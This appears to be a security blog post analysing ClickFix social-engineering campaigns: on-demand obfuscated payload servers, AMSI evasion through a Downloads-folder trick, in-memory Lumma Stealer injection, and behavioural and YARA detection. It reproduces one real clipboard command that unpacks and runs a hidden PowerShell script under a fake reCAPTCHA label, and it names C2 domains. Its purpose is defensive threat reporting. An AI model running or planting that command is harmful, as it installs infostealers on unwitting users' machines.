ProBackend
active vulnerability exploitation
2 hours ago6 min read

API-Driven ClickFix and the Evolution of Artificial Intelligence Cybersecurity Threats

As ClickFix transitions to an API-driven, on-demand service, threat actors use freshly scrambled payloads and native Windows utilities to bypass traditional AV and EDR solutions, making memory and YARA analysis critical for defenders.

The ClickFix API Economy

Here's the thing about ClickFix that most defenders miss: it was never really about the copy-paste trick. The social engineering is just the delivery mechanism. What's actually scary is how fast the backend has professionalized.

Bert-Jan Pals' research at OrangeCon, presented in early June 2026 and published June 30, took apart several ClickFix platforms and analyzed roughly 3,000 payloads from live campaigns. The finding wasn't just that ClickFix is widespread — ESET measured a 517% jump from late 2024 into the first half of 2025, and Microsoft's 2025 Digital Defense Report put it at 47% of initial-access cases seen by its Defender Experts team — but that the entire operation now runs on API-driven servers.

Each visitor to a ClickFix landing page gets the same malware in a different disguise. Pals asked one server for 100 payloads and got 100 different ones, wrapped in a rotating mix of Base64, AES, TripleDES, Rijndael, and Deflate. Strip the wrapping and they all unpack to the same script, running in memory through a PowerShell runspace. The disguise is disposable. The malware underneath isn't.

This is what turns ClickFix from a clever trick into an industrial-scale threat. The "as-a-service" label isn't just branding — ESET has tracked criminals selling ready-made ClickFix builders to other attackers, and Pals found the commercialization going one layer deeper in how each payload is churned out on request. The same platform serves lures in 25 languages and matches the command to the visitor's operating system, with macOS versions running alongside Windows.

The technique even has its own MITRE ATT&CK entry now: T1204.004.

The ClickFix API Economy

How the API Generates Disposable Payloads

The backend architecture is straightforward in a way that makes it terrifying. A request comes in, the server checks an access token, logs the caller, and returns a freshly scrambled command. No exploit code on the landing page. No downloadable file for traditional antivirus to flag at the gateway level.

Pals' research showed that stripping away the rotating wrappers reveals a consistent core script. At least for now, they all unpack to the same PowerShell runspace execution. But Pals warns the core payload will likely start changing per victim before long — which means we're probably looking at the calm before a much more personalized storm.

What makes this particularly dangerous for enterprise environments is that the initial compromise stage has no immediate exploits. Standard gateway inspections find nothing malicious because there's literally nothing to inspect on the landing page. The user has to do the dirty work themselves, which is why this technique bypasses so many automated security controls.

The scale is not theoretical either. Proofpoint tied state-backed groups from Russia, Iran, and North Korea — including APT28, MuddyWater, and Kimsuky — to campaigns that dropped ClickFix into their existing infection chains. North Korean crews even built a fake-job "ClickFake Interview" version to hit cryptocurrency workers. And security firm Expel found one ClearFake wave that likely infected as many as 147,521 systems since late August 2025.

ClickFix stopped being a criminals-only tool a while ago. The named relatives — FileFix, DownloadFix — lean on other trusted Windows tools and keep the pattern alive.

How the API Generates Disposable Payloads

Defense Evasion: AMSI, EDR, and the Downloads Folder Trick

The second major finding from Pals' research is a direct answer to defenders who watch the clipboard. Instead of copying a malicious command, the newer pages copy a harmless-looking one.

The page quietly downloads a file to the Downloads folder, and the clipboard gets a short "orchestrator" line that moves that file, unpacks it, and runs the script inside. Because the pasted line is only that orchestrator and not the payload itself, it's built to slide past AMSI — the Windows feature that lets antivirus scan scripts before they run. The bad code sits in the downloaded file, off to the side.

The observed clipboard line looked like this:

powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* I am not a robot reCAPTCHA Verification ID:7947 *\""

Execution has drifted toward stealth as well. The original 2024 lure told people to press Windows+R and paste into the Run box. A newer version, common through 2025 and into 2026, points them to Windows+X and the Windows Terminal instead. Terminal use looks more ordinary, and unlike the Run box, it leaves no trace in the RunMRU registry key that investigators normally check.

Final payloads like Lumma Stealer are injected directly into running processes — chrome.exe and msedge.exe — using techniques like QueueUserAPC(). The code runs fileless in memory, frustrating conventional disk-based scanners. Microsoft's research confirmed that these payloads are seldom written to disk as .exe or .dll files, instead loaded and launched in memory by living-off-the-land binaries like msbuild.exe, regasm.exe, or powershell.exe.

Why Artificial Intelligence Cybersecurity Threats Demand Behavioral Detection

The defensive lesson hasn't changed. The details have.

Rotating packers make static file and URL signature checks useless. Because execution happens under legal processes and LOLBins, basic EDR rules are easily bypassed or specifically excluded. The dependable signals are process chains, not clipboard text: explorer.exe or WindowsTerminal.exe launching powershell.exe, cmd.exe, or msiexec.exe and reaching out to the network right after.

Those were the most common launchers in Pals' data, with PowerShell and cmd tied at about 39% each and msiexec close behind at 34%. This is where behavioral EDR, application-control rules that limit which programs can call script interpreters, and plain user guidance — "never paste a command you were told to run into the Run box or a terminal" — all still hold.

But here's where it gets complicated for defenders. The Downloads-folder method adds one more thing to hunt: an innocent-looking one-liner that touches the Downloads folder and then spawns a hidden PowerShell. Traditional signature-based detection simply can't keep up with this level of obfuscation and behavioral mimicry.

This is exactly why the artificial intelligence cybersecurity threats landscape requires a fundamental shift in detection strategy. We're no longer fighting static malware with static signatures. The attack surface has evolved into something that demands behavioral analysis, memory inspection, and pattern recognition that only advanced detection frameworks can provide.

YARA Analysis as the Primary Detection Option

YARA signatures can target the structure of JavaScript code in fake interstitial validation layers. Scanning process memory using YARA can identify the unpacked PowerShell commands, VBScript components, and core infostealer payloads like Lumma Stealer that remain consistent beneath the disposable randomized wrappers.

Analyzing known C2 payload server patterns — comicstar.lat, babybon.cfd, merkantalolol.asia — and memory artifacts associated with LOLBin execution chains (such as MSBuild loading custom VBScripts) gives defenders something concrete to hunt against. A connection to one of these doesn't prove infection, but it means a command was most likely placed in someone's clipboard.

The Microsoft Security Blog from August 2025 documented how threat actors obfuscate the JavaScript that generates the visual lures or download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands. This means that while the wrappers rotate, the underlying patterns in memory remain detectable if you know what to look for.

Pals' verdict on the technique is blunt: "ClickFix is here to stay." The pattern across his research is that ClickFix shifts the moment defenders catch up, and the move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat.

The next thing worth watching is whether the malware itself, not just its wrapper, starts changing from one victim to the next. Because if that happens, we're looking at a threat landscape where even YARA signatures might need to evolve in real time — and that's where artificial intelligence cybersecurity threats truly demand AI-native defense capabilities.

More blogs